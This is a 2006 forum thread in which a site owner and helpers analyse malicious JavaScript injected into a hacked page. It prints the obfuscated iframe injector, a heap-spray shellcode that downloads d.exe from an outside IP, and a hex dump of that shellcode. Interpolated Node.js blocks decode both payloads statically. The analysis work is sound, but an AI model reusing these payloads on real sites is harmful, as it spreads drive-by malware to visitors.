Velocity Reviews - Computer Hardware Reviews

Malicious javascript obfuscation

 
 
Wong Yung
10-23-2006
Hi

Recently the webserver my page is on was hacked. Someone put in some
malicious javascript which I believe redirects the browser to another
webpage. I want to go to the URL directly using something like links
on Linux or Safari on Mac (as I have a strong suspicion it's probably
exploiting some IE vulnerability or trying to download some Windows
trojan) to work out what exactly it was trying to do. However it looks
like the URL was obfuscated:

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCode(s.charCodeAt(i)-4);}document.write(o);
Is there any tool I can use to work out what the URL is from this?

Thanks!

 
Todd H.
10-23-2006
"Wong Yung" <(E-Mail Removed)> writes:

> Hi
>
> Recently the webserver my page is on was hacked. Someone put in some
> malicious javascript which I believe redirects the browser to another
> webpage. I want to go to the URL directly using something like links
> on Linux or Safari on Mac (as I have a strong suspicion it's probably
> exploiting some IE vulnerability or trying to download some Windows
> trojan) to work out what exactly it was trying to do. However it looks
> like the URL was obfuscated:
>
>
> s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCode(s.charCodeAt(i)-4);}document.write(o);
>
>
> Is there any tool I can use to work out what the URL is from this?


It's javascript so a web browser is all you need.

It's a rot 4 encoding if you will. It's just taking each of the
characters of that string s and subtracting 4 from it
i.e. s.charCodeAt(i)-4

By changing document.write(o) to an alert() call you can see what it
says.

It translates to

<iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">


And that page appears to redirect somewhere else.

<a
href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>



--
Todd H.
http://www.toddh.net/
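The decode step Todd describes, as an added example that is not code from the thread: a small Node.js script that reverses the charCodeAt(i)-4 transform statically, without evaluating the script or calling document.write(), and, going one step beyond the post, brute-forces the shift constant when it is not obvious from the source. The encoded string is the one from the post with the forum's line-wrap spaces removed; the scoring weights in scoreCandidate are my own assumption, chosen for injected HTML/URL payloads of this kind.

```javascript
// Added example, not code from the thread: static decoder for the
// "subtract 4 from every character code" obfuscation Todd describes.
// Nothing here is evaluated as script, so it can be run on hostile input.

// Encoded string as posted, with the forum's line-wrap spaces removed.
const ENCODED =
  "@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B";

// Apply a constant shift to every UTF-16 code unit (the script used -4).
function shiftDecode(s, shift) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    out += String.fromCharCode(s.charCodeAt(i) + shift);
  }
  return out;
}

// Fraction of characters that are printable ASCII (or tab/CR/LF).
function printableRatio(text) {
  let n = 0;
  for (let i = 0; i < text.length; i++) {
    const c = text.charCodeAt(i);
    if ((c >= 0x20 && c <= 0x7e) || c === 0x09 || c === 0x0a || c === 0x0d) n++;
  }
  return text.length ? n / text.length : 0;
}

// Heuristic score: printable text plus HTML/URL markers typical of injected
// content. The weights are an assumption, tuned only for this payload type.
function scoreCandidate(text) {
  let score = printableRatio(text);
  if (/<[a-zA-Z]+[\s>]/.test(text)) score += 5;             // looks like an HTML tag
  score += 10 * (text.match(/https?:\/\//g) || []).length; // contains URLs
  return score;
}

// Try every shift in [-maxShift, maxShift] and keep the best-scoring one.
// Goes beyond the post: handy when the constant is buried in a minified script.
function bruteForceShift(s, maxShift = 32) {
  let best = { shift: 0, score: -Infinity, text: "" };
  for (let k = -maxShift; k <= maxShift; k++) {
    if (k === 0) continue;
    const text = shiftDecode(s, k);
    const score = scoreCandidate(text);
    if (score > best.score) best = { shift: k, score, text };
  }
  return best;
}

// Pull URLs out of the decoded markup so they can be checked against
// blocklists or reported, without ever loading them in a browser.
function extractUrls(html) {
  return Array.from(html.matchAll(/https?:\/\/[^\s"'<>]+/g), (m) => m[0]);
}

const result = bruteForceShift(ENCODED);
console.log(`shift ${result.shift}: ${result.text}`);
console.log("URLs:", extractUrls(result.text));
```

Running it picks shift -4 and prints the same hidden iframe Todd quotes; the brute-force step is cheap because the alphabet is tiny, and scoring on "http://" and tag-like text beats a plain printable-character count, since almost every small shift of a printable string is still printable.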
 
Wong Yung
10-23-2006

Todd H. wrote:
> "Wong Yung" <(E-Mail Removed)> writes:
>
> > Hi
> >
> > Recently the webserver my page is on was hacked. Someone put in some
> > malicious javascript which I believe redirects the browser to another
> > webpage. I want to go to the URL directly using something like links
> > on Linux or Safari on Mac (as I have a strong suspicion it's probably
> > exploiting some IE vulnerability or trying to download some Windows
> > trojan) to work out what exactly it was trying to do. However it looks
> > like the URL was obfuscated:
> >
> >
> > s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCode(s.charCodeAt(i)-4);}document.write(o);
> >
> >
> > Is there any tool I can use to work out what the URL is from this?

>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
>
> By changing document.write(o) to an alert() call you can see what it
> says.
>
> It translates to
>
> <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
>
>
> And that page appears to redirect somewhere else.
>
> <a
> href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
>
>
>
> --
> Todd H.
> http://www.toddh.net/


Thanks very much Todd!

I went to the webpage and it's very strange. It doesn't seem to
attempt to download anything. They (kaonline.biz) claim that someone
is trying to blackmail them by sending spam in their name and then
trying to extort money from them. If this is true and they are not
lying their heads off I wonder if this is part of the supposed
extortion attempt. Or maybe they're just saying that because really
they are spammers and...*Sigh* I don't know what to believe anymore.

Still this is only what it is doing *now*. The webserver looks like it
has been hacked for a while now and god knows what's been happening in
the meantime.

Thanks though for helping out!

 
Todd H.
10-23-2006
"Wong Yung" <(E-Mail Removed)> writes:

> Thanks very much Todd!
>
> I went to the webpage and it's very strange. It doesn't seem to
> attempt to download anything. They (kaonline.biz) claim that someone
> is trying to blackmail them by sending spam in their name and then
> trying to extort money from them. If this is true and they are not
> lying their heads off I wonder if this is part of the supposed
> extortion attempt. Or maybe they're just saying that because really
> they are spammers and...*Sigh* I don't know what to believe anymore.
>
> Still this is only what it is doing *now*. The webserver looks like it
> has been hacked for a while now and god knows what's been happening in
> the meantime.
>
> Thanks though for helping out!


No problem.

Was your webhost based on cpanel.net software? A few weeks ago, a
whole bunch of cpanel based sites got owned and were used largely to
spread the Internet Explorer 0day exploit du jour. I think that
issue has been patched but it did affect a lot of folks. Curious if
you were one of em.

Best Regards,
--
Todd H.
http://www.toddh.net/
 
Wong Yung
10-23-2006

Todd H. wrote:
> "Wong Yung" <(E-Mail Removed)> writes:
>
> > Thanks very much Todd!
> >
> > I went to the webpage and it's very strange. It doesn't seem to
> > attempt to download anything. They (kaonline.biz) claim that someone
> > is trying to blackmail them by sending spam in their name and then
> > trying to extort money from them. If this is true and they are not
> > lying their heads off I wonder if this is part of the supposed
> > extortion attempt. Or maybe they're just saying that because really
> > they are spammers and...*Sigh* I don't know what to believe anymore.
> >
> > Still this is only what it is doing *now*. The webserver looks like it
> > has been hacked for a while now and god knows what's been happening in
> > the meantime.
> >
> > Thanks though for helping out!

>
> No problem.
>
> Was your webhost based on cpanel.net software? A few weeks ago, a
> whole bunch of cpanel based sites got owned and were used largely to
> spread the Internet Explorer 0day exploit du jour. I think that
> issue has been patched but it did affect a lot of folks. Curious if
> you were one of em.
>
> Best Regards,
> --
> Todd H.
> http://www.toddh.net/



No,

I think the webserver was running Apache on Linux (I say "I think"
because I wasn't admining it so I don't know what exactly was running
on the computer). The problem is it wasn't updated and so I guess in
the end you can say it was all our own fault.

*Sigh* I'm still worried though because even though it looks like the
hack is fairly harmless now it looks like it was hacked a while ago and
who knows if they hadn't taken the opportunity to download Trojans onto
a few computers first. You know how it is with security - once one
thing gets compromised everything touching it is tainted because you
can't be sure what the hackers were doing.

Usually I run either Linux (most of these redirect things lead to some
Windows specific malware) or Windows with Firefox with the NoScript
extension which blocks all javascript except on sites you whitelist.
However, I *did* test my website in IE several times when the script
was present so I could make sure the css looked OK. Nor did I turn off
scripting in IE because I hardly ever use it and I didn't think my own
website would be a security risk. Not sure what to do now...probably
run a full anti-virus and anti-spyware check but you know that doesn't
catch everything. On the bright side of things I don't remember any
anti-virus alerts, or probably more importantly any warnings about
something trying to replace program x with a different version (I have
a program which detects when program files get changed) when I was
looking at my site in IE...

Anyway, thanks a lot for your help. It did help relieve my mind a lot.

 
Wong Yung
10-23-2006
Todd H. wrote:
> "Wong Yung" <(E-Mail Removed)> writes:
>
> > Hi
> >
> > Recently the webserver my page is on was hacked. Someone put in some
> > malicious javascript which I believe redirects the browser to another
> > webpage. I want to go to the URL directly using something like links
> > on Linux or Safari on Mac (as I have a strong suspicion it's probably
> > exploiting some IE vulnerability or trying to download some Windows
> > trojan) to work out what exactly it was trying to do. However it looks
> > like the URL was obfuscated:
> >
> >
> > s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCode(s.charCodeAt(i)-4);}document.write(o);
> >
> >
> > Is there any tool I can use to work out what the URL is from this?

>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
>
> By changing document.write(o) to an alert() call you can see what it
> says.
>
> It translates to
>
> <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
>
>
> And that page appears to redirect somewhere else.
>
> <a
> href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
>
>
>
> --
> Todd H.
> http://www.toddh.net/



Actually looking more closely at it there seems to be something else
going on as well. If I use links, it does exactly as you say.
However, using Opera, Firefox or Konqueror what it does is goes to a
webpage with


<script>var
s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do{s+=s;}while(s.length<0x0900000);s+=unescape
("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320
%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2
%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B
%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B
%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A
%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B
%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40
%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304
%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF
%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D
%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF
%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF
%u7468%u7074%u2F3A%u362F%u2E36%u3633%u322E%u3134%u322E
%u3334%u642F%u652E%u6578");</script></head><body><embed
src="hacked3_files/-----------------------------------------------------------.html">

(I named the file hacked3.html)

The
"hacked3_files/-----------------------------------------------------------.html"
is a html file with:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /expd/----------- (the hyphens
continue forever)
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAA ANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYY ZZZZ0000111122223333444455556666777788889999.wmv
on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle
the request.
<HR>
<ADDRESS>Apache/1.3.37 Server at 66.36.241.243 Port 80</ADDRESS>
</BODY></HTML>

So it looks like on Konqueror/Firefox/Opera it was trying to download a
wmv file (which no longer exists on the server). On links however it
seems to go to an entirely different webpage, the one which as you
point out tries to go to http://kaonline.biz/.

 
Ant
10-24-2006
"Wong Yung" wrote:

> Actually looking more closely at it there seems to be something else
> going on as well. If I use links, it does exactly as you say.
> However, using Opera, Firefox or Konqueror what it does is goes to a
> webpage with
>
> <script>var
> s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
> do{s+=s;}while(s.length<0x0900000);s+=unescape
> ("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320

[snip]

That variable "s" is storing executable code. The script inserts at
least 9437184 "A" characters (a NOP sled of 0x41), followed by code
which looks like this when dumped out in hex/ascii:

0000 EB 54 8B 75 3C 8B 74 35 78 03 F5 56 8B 76 20 03 .T.u<.t5x..V.v .
0010 F5 33 C9 49 41 AD 33 DB 36 0F BE 14 28 38 F2 74 .3.IA.3.6...(8.t
0020 08 C1 CB 0D 03 DA 40 EB EF 3B DF 75 E7 5E 8B 5E ......@..;.u.^.^
0030 24 03 DD 66 8B 0C 4B 8B 5E 1C 03 DD 8B 04 8B 03 $..f..K.^.......
0040 C5 C3 75 72 6C 6D 6F 6E 2E 64 6C 6C 00 43 3A 5C ..urlmon.dll.C:\
0050 55 2E 65 78 65 00 33 C0 64 03 40 30 78 0C 8B 40 U.exe.3.d.@0x..@
0060 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C ..p...@....@4.@|
0070 8B 40 3C 95 BF 8E 4E 0E EC E8 84 FF FF FF 83 EC .@<...N.........
0080 04 83 2C 24 3C FF D0 95 50 BF 36 1A 2F 70 E8 6F ..,$<...P.6./p.o
0090 FF FF FF 8B 54 24 FC 8D 52 BA 33 DB 53 53 52 EB ....T$..R.3.SSR.
00A0 24 53 FF D0 5D BF 98 FE 8A 0E E8 53 FF FF FF 83 $S..]......S....
00B0 EC 04 83 2C 24 62 FF D0 BF 7E D8 E2 73 E8 40 FF ...,$b...~..s.@.
00C0 FF FF 52 FF D0 E8 D7 FF FF FF 68 74 74 70 3A 2F ..R.......http:/
00D0 2F 36 36 2E 33 36 2E 32 34 31 2E 32 34 33 2F 64 /66.36.241.243/d
00E0 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 .exe............

I'm guessing it would use urlmon.dll to download the file "d.exe" from
66.36.241.243, which is a small executable packed using FSG. There's
also a reference to a file "C:\U.exe".

> The
> "hacked3_files/-----------------------------------------------------------.html"
> is a html file with:


[...]

> AAAABBBB [snip] NNNNOOOOAAA [snip] 88889999.wmv


The part between my snips had a control character (0x05) either side
of it. I don't know the reason for that.

[...]

> So it looks like on Konqueror/Firefox/Opera it was trying to download a
> wmv file (which no longer exists on the server). On links however it
> seems to go to an entirely different webpage, the one which as you
> point out tries to go to http://kaonline.biz/.


It appears to be an exploit involving a wmv vulnerability, but I don't
know how the binary code in the script variable "s" gets to be run.

Also spotted here:
http://www.castlecops.com/p842233-Po...V_exploit.html
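Ant's hex dump reproduced as an added example (not code from the thread): a Node.js script that turns the %uXXXX escapes into bytes, dumps them in the same offset/hex/ASCII layout, lists the printable strings (the DLL name, the drop path and the download URL Ant points out), and computes how large the "A" sled actually grows given the do/while doubling loop. Each %uXXXX is one UTF-16 code unit, and the spray lays it out little-endian in memory, so %u54EB becomes the bytes EB 54. The payload is transcribed from the post with the forum's line-wrap spaces removed; only the second unescape() (the code after the %u4141 sled) is included, and nothing here executes it.

```javascript
// Added example, not code from the thread: decode the %uXXXX shellcode Ant
// analysed into bytes and triage it statically (dump, strings, sled size).

// Second unescape() argument as posted, wrap spaces removed (transcribed).
const PAYLOAD =
  "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320" +
  "%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2" +
  "%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B" +
  "%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B" +
  "%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A" +
  "%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B" +
  "%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40" +
  "%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304" +
  "%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF" +
  "%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D" +
  "%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF" +
  "%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF" +
  "%u7468%u7074%u2F3A%u362F%u2E36%u3633%u322E%u3134%u322E" +
  "%u3334%u642F%u652E%u6578";

// unescape("%uXXXX") yields one UTF-16 code unit; in memory it is stored
// little-endian, so %u54EB becomes the bytes EB 54. Plain %XX escapes are
// accepted too, since real payloads often mix both forms.
function unicodeEscapeToBytes(enc) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g;
  let m;
  while ((m = re.exec(enc)) !== null) {
    if (m[1] !== undefined) {
      const v = parseInt(m[1], 16);
      bytes.push(v & 0xff, v >> 8); // low byte first
    } else {
      bytes.push(parseInt(m[2], 16));
    }
  }
  return Uint8Array.from(bytes);
}

// Classic offset / hex / ASCII dump, 16 bytes per line (Ant's layout).
function hexDump(bytes, width = 16) {
  const lines = [];
  for (let off = 0; off < bytes.length; off += width) {
    const chunk = Array.from(bytes.slice(off, off + width));
    const hex = chunk.map((b) => b.toString(16).toUpperCase().padStart(2, "0")).join(" ");
    const ascii = chunk.map((b) => (b >= 0x20 && b <= 0x7e ? String.fromCharCode(b) : ".")).join("");
    lines.push(`${off.toString(16).toUpperCase().padStart(4, "0")} ${hex.padEnd(width * 3 - 1)} ${ascii}`);
  }
  return lines;
}

// Runs of printable ASCII at least minLen long: DLL names, paths, URLs.
function extractStrings(bytes, minLen = 4) {
  const latin1 = Array.from(bytes, (b) => String.fromCharCode(b)).join("");
  const re = new RegExp(`[\\x20-\\x7e]{${minLen},}`, "g");
  return latin1.match(re) || [];
}

// Final length of s after `do { s += s; } while (s.length < threshold)`,
// computed arithmetically instead of allocating the spray.
function sprayLength(initialLen, threshold) {
  let n = initialLen;
  do {
    n += n;
  } while (n < threshold);
  return n;
}

const bytes = unicodeEscapeToBytes(PAYLOAD);
console.log(hexDump(bytes).join("\n"));
console.log("strings:", extractStrings(bytes));
// 8 code units of U+4141 doubled until >= 0x900000 code units
console.log("sled code units:", sprayLength(8, 0x0900000));
```

The first dump line matches Ant's ("0000 EB 54 8B 75 ..."), the strings come out as urlmon.dll, C:\U.exe and the d.exe download URL, and sprayLength shows the sled ends at 16777216 code units (twice that in bytes of 0x41), which is why Ant's "at least 9437184" is a lower bound: the loop only stops after the doubling that crosses the threshold.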


 
Wong Yung
10-24-2006

Ant wrote:
> "Wong Yung" wrote:


>
> > So it looks like on Konqueror/Firefox/Opera it was trying to download a
> > wmv file (which no longer exists on the server). On links however it
> > seems to go to an entirely different webpage, the one which as you
> > point out tries to go to http://kaonline.biz/.

>
> It appears to be an exploit involving a wmv vulnerability, but I don't
> know how the binary code in the script variable "s" gets to be run.
>
> Also spotted here:
> http://www.castlecops.com/p842233-Po...V_exploit.html



Wow. Thanks very much for the info. And thanks heaps for
unobfuscating the stuff in javascript. Hmmm...looking at the
castlecops link it looks like we aren't the only ones who were hacked
using the same thing. Do you have any idea why links goes to
kaonline.biz? I'm trying to work out what role they play in all of
this.

 
Ant
10-25-2006
"Wong Yung" wrote:

> Wow. Thanks very much for the info. And thanks heaps for
> unobfuscating the stuff in javascript. Hmmm...looking at the
> castlecops link it looks like we aren't the only ones who were hacked
> using the same thing. Do you have any idea why links goes to
> kaonline.biz? I'm trying to work out what role they play in all of
> this.


I don't know if they are involved. They say they're being attacked,
so you could report it to them, but as far as I can tell there is no
exploit if the redirect is to kaonline.biz.

If I use wget on the "e7da7.in" link, I get redirected to kaonline.
However, if I use telnet, the redirection is to:
ht_p://66.36.241.243/expd/index.php
(I've munged the "http" in case anyone's click-happy)

That's where the malicious code is, and I found a different (and more
obfuscated) exploit to what you posted before.

Where you are redirected, and what exploit is served up probably
depends on the user-agent header of the http request.


 
Wong Yung
10-27-2006

Ant wrote:
> "Wong Yung" wrote:
>
> > Wow. Thanks very much for the info. And thanks heaps for
> > unobfusticating the stuff in javascript. Hmmm...looking at the
> > castlecops link it looks like we aren't the only ones who were hacked
> > using the same thing. Do you have any idea why links goes to
> > kaonline.biz? I'm trying to work out what role they play in all of
> > this.

>
> I don't know if they are involved. They say they're being attacked,
> so you could report it to them, but as far as I can tell there is no
> exploit if the redirect is to kaonline.biz.
>
> If I use wget on the "e7da7.in" link, I get redirected to kaonline.
> However, if I use telnet, the redirection is to:
> ht_p://66.36.241.243/expd/index.php
> (I've munged the "http" in case anyone's click-happy)
>
> That's where the malicious code is, and I found a different (and more
> obfuscated) exploit to what you posted before.
>
> Where you are redirected, and what exploit is served up probably
> depends on the user-agent header of the http request.


*Sigh* I couldn't get a nice simple evil guy could I? BTW what is this
other more obfuscated exploit that you found?

 